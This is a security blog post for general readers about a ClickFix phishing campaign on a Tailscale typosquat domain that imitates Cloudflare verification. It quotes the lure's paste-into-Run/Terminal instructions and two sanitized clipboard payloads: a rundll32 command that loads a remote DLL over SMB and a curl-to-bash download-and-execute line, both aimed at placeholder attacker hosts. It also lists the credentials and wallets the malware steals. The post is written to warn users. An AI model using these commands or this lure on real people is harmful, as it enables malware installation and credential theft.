I travel constantly, and the lack of reliable remote access to my home network had finally caught up with me. Tailscale is the obvious answer. I searched for it between flights to finally get it set up.
A result in the search page caught my eye — the domain looked almost right, but something was off.
tailsacle.work
Two letters swapped. The legitimate domain is tailscale.com. The TLD .work was the second tell — Tailscale doesn't have a public-facing presence on .work. A typosquat, showing up in Google search results for a major software product. That was curious enough to investigate.
Four days later I'd mapped a phishing operation that builds on techniques researchers have been tracking since 2023 — but applies them in a way that has real implications for defenders. The technical breakdown lives over on the NOC blog for threat researchers who want the full receipts. What I want to walk through here is the part that matters to a normal user: what the attack actually looks like on your screen, what it makes your computer do, and why it works.
What the user actually sees
What loaded looked like a Cloudflare bot-detection page. Familiar grey-on-white styling. "Performing security verification." A "Verify you are human" checkbox at the center. A "Ray ID" identifier at the bottom of the page and a "Performance and Security by Cloudflare" attribution line. The whole thing looks indistinguishable from a real Cloudflare interstitial because — as it turns out — most of it actually is a real Cloudflare interstitial. The attacker configured a Cloudflare account, pointed their typosquat domain at it, and uses Cloudflare's actual bot-mitigation product as part of the lure. The why of that gets covered in the NOC piece.
I clicked the checkbox. After a brief delay, a popup appeared in the middle of the page. On Windows, it said this:
Verification Steps
I am not a robot - reCAPTCHA Verification ID: 1468206
To better prove you are not a robot, please:
- Press & hold the Windows Key ⊞ + R.
- In the verification window, press Ctrl + V.
- Press Enter on your keyboard to finish.
You will then observe and agree:
"I am not a robot - reCAPTCHA Verification ID: 1468206"
On a Mac, the same page presents a slightly different version of the popup:
Verification Steps
I am not a robot - reCAPTCHA Verification ID: 1468206
To better prove you are not a robot, please:
- Open Terminal application on your Mac (you can find it in Applications → Utilities → Terminal).
- In the verification window, press Command + V.
- Press Enter on your keyboard to finish.
Both popups have a calm, professional, slightly-corporate aesthetic. Both reference a verification ID, which is a common pattern in real captcha systems and helps the page feel legitimate. Both give you three numbered steps that look like a procedure you've probably followed before in some other context. Both are designed to feel like the natural conclusion of a routine I-am-not-a-robot check.
What is on your clipboard
Here is what most users will not realize: the clipboard is not empty when they open the Run dialog. The page has already written something to it. The moment the verification checkbox is clicked, JavaScript silently replaces whatever is on the clipboard with a command. The popup that appears after is not instructing the user to verify themselves; it is instructing them to paste and execute the command the page just planted there.
Pasting into a text editor instead of the Run dialog reveals what the clipboard actually contains.
On Windows, the clipboard held a command that looked roughly like this (sanitized to avoid serving as a recipe for harm):
cmd /c "" start rundll32.exe \\<attacker-controlled-host>\<token>\<file>,rn
What it does, if you let it run:
cmd /c ""— opens a Windows command shell with an empty command (visually innocuous; runs silently)start rundll32.exe \\<host>\<token>\<file>,rn— tells Windows to download a file over SMB from the attacker's server and execute one of its functions in memory
The whole thing relies entirely on a legitimate, signed Microsoft utility called rundll32.exe. There is no malicious binary downloaded to disk. There is no obvious malware to flag. Windows is just doing what Windows is designed to do: load and run a DLL when asked.
On Mac, the clipboard held something like this:
/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '<attacker-host>/<unique-id>')"
Same idea, different syntax. Curl downloads a script from the attacker's server and pipes it directly into bash for execution.
What both of these payloads do once they run is the same: they harvest as much as they can from your machine as fast as they can. We're talking about things like browser-saved passwords, active session cookies (which bypass two-factor authentication entirely because the user is already logged in), cryptocurrency wallets and seed phrases, SSH keys, the .aws/credentials and .env files in any project folder, password manager vaults, and Slack/Discord/Telegram desktop session tokens. Smash-and-grab. Thirty to ninety seconds and gone.
If a user pastes that command into the Run dialog and presses Enter, their machine does all of that without any pop-up, any warning, any UAC prompt, anything. Windows just executes the legitimate signed utility. EDR products on the machine might or might not catch it; antivirus probably will not, because there is no malicious file — only a signed Microsoft tool being told to load a remote DLL. Most home users will not know anything happened until weeks later, when their crypto wallet gets drained, or their email account gets hijacked, or their employer's internal Slack starts receiving messages "from them."
This style of attack is called ClickFix. It has been the dominant malware-delivery technique online since late 2024, and it works for one specific reason: every part of the chain is built around the user's trust.
The trust chain
When you really break this down, there's no exploit involved. No zero-day. No malicious code running anywhere it shouldn't. Every component of the chain is legitimate, signed, and operating exactly as designed.
- Google ranked the site in its search results
- Cloudflare provided the TLS certificate, the bot-mitigation interstitial styling, and the hosting front-end
- Windows ran
rundll32.exebecause that's whatrundll32.exedoes when you tell it to - macOS ran the bash script because that's what bash does
- The browser's Clipboard API let JavaScript write to the clipboard because the user clicked a checkbox, which counts as a "user gesture," which is exactly when the spec says clipboard writes are allowed
What got compromised was not any of those products. What got compromised was user trust, layered on top of each of them.
You trusted Google to surface the right Tailscale. You trusted the Cloudflare-styled interstitial to be Cloudflare. You trusted that "Verify you are human" meant what it has meant a thousand other times you've seen it. You trusted that an instruction popup wouldn't tell you to paste something dangerous. You trusted that the Run dialog or the Terminal were tools for you to use, not channels for an attacker to reach through your screen and into your operating system.
The attacker didn't break any of those trust relationships. They just borrowed credibility from each one and stacked it. Six trust signals, none of them owned by the attacker, all of them stacked together to produce a moment of "this is normal, I should comply."
The attack chain depends on the user complying with all three steps. Most will. The instructions look routine, the context feels legitimate, and by the time the Run dialog is open the user is already committed to completing the process.
What I stumbled into
After the initial discovery, I spent four days pulling the campaign apart. What I found was not the work of a script kiddie.
The lure was a recent typosquat registered through a budget registrar. The Cloudflare-styled verification page is actually using a real Cloudflare product configured by the attacker — not a clone, the real thing, weaponized by setting up an account and pointing the typosquat domain at it. From a residential cellular connection, the page rendered the full malicious payload. From a Linode VPS in a US datacenter, the exact same URL with the exact same headers rendered an innocuous editorial article about networking products. Same URL, same minute, different IP reputation, completely different content. That's intentional. The actor knows every automated phishing scanner runs from datacenter IPs, so they show those scanners a clean decoy and show real users the actual lure.
The actor rotates payload-hosting domains every few hours, registering new ones through whichever registrar has the slowest abuse desk. When one registrar started taking them down too quickly, they pivoted to another. Each rotation costs them about ten dollars and a few minutes of time. The asymmetry is structural and it favors the attacker.
And then I found something that made the investigation worth the time.
Most of the campaign's operational state — the per-victim authorization logic, the malicious code itself, the bookkeeping that lets the lure decide which visitors get the payload and which get redirected harmlessly — lives somewhere the defensive ecosystem almost never looks. The attacker doesn't run their command-and-control on a server you can take down. They run it somewhere public, free, and effectively immune to conventional takedowns.
I'm not going to explain where, here. The detail matters and the implications matter, and they deserve a proper technical treatment rather than a sentence in a user-facing post. But the short version is: this operator has built a phishing kit that uses a public blockchain as its persistence and authorization mechanism. Researchers at Guardio Labs, JUMPSEC, and Google/Mandiant have been tracking this class of technique since 2023. What this campaign adds is a per-victim IP authorization layer that has real implications for defenders — and it's been running uninterrupted for at least nine months across countless rotated typosquat domains. The technical write-up — with the full mechanism, the IOCs, the queries researchers can use to confirm victim compromise, and the prior research this builds on — is over on the NOC blog for anyone who works in threat intelligence or DFIR.
For everyone else: what matters is that this campaign isn't an outlier. It's representative of where phishing is going. The actors are getting more sophisticated, the infrastructure is getting more resilient, and the defensive tools that handled phishing five years ago are no longer sufficient.
What this means for normal people
You're not going to know any of the above when you sit down on a Sunday afternoon to install some software. You're going to search. You're going to click the top result. You're going to see something that looks like a Cloudflare captcha. You're going to do what it says. And by the time you realize anything is wrong, the actor has already approved your IP, your machine is harvesting your browser cookies and password manager and crypto wallets, and the data is being uploaded back to the attacker through an entirely legitimate-looking HTTPS connection.
What can a normal user do?
Stop and ask why. A verification page asking you to paste something into your operating system's command runner is not a normal thing. It is never a normal thing. Cloudflare doesn't ask you to do that. Google doesn't. Microsoft doesn't. Apple doesn't. If a site is asking you to paste something into Run or Terminal as part of "verification," you are being attacked. Close the tab. Don't paste it. Don't even paste it into a text editor to see what it is, unless you know what you're doing — even previewing the wrong thing in a clipboard inspector can give an attacker telemetry on the visitor.
Bookmark the real domains for software you use regularly. Search ranking is gamed by attackers constantly. Search results are not inherently safe, whether organic or paid. Tailscale, 1Password, Bitwarden, KeePass, your bank, your password manager, your email provider — bookmark them and use the bookmark. The few seconds you save by clicking the first search result is exactly the few seconds attackers depend on.
Run DNS-layer protection before the request hits your browser. This is the cheapest, highest-leverage piece of the defensive puzzle and most people don't have it. The way most modern phishing works, the attacker absolutely depends on your computer being able to resolve their fresh, dodgy typosquat domain. If your DNS resolver simply refuses to look up freshly-registered typosquat domains on suspicious TLDs, none of the rest of the attack chain ever gets a chance to fire. You never see the captcha. You never click the checkbox. You never get the popup. The attacker's infrastructure becomes irrelevant because the lookup fails at the front door. The architecture of how that works is over on CleanBrowsing's blog.
The closing observation
A typosquat in Google search results for a major software brand. Every layer of the attack chain looks normal until the very last step. By the time a user gets to step 3 of the "verification," their hands are already moving.
Anyone can be in that position.
The campaign is still running as I write this. The actor is adapting in real time, registering new infrastructure within hours of the last batch getting taken down. They've been doing this for nine months. They will probably keep doing it for many more.
If you're in security or DFIR or threat intel, the technical write-up on NOC has the full breakdown — how this campaign builds on documented techniques like EtherHiding, the IOCs, the on-chain attribution evidence the actor accidentally left in public, and the detection guidance to find this in your own environment. If you're thinking about your organization's defensive architecture, the CleanBrowsing piece lays out the case for DNS-layer protection as the cheapest reliable intervention point against this whole class of attack.
For everyone else: stop and ask why. Bookmark the real domain. Run protective DNS. Don't paste things into Run dialogs.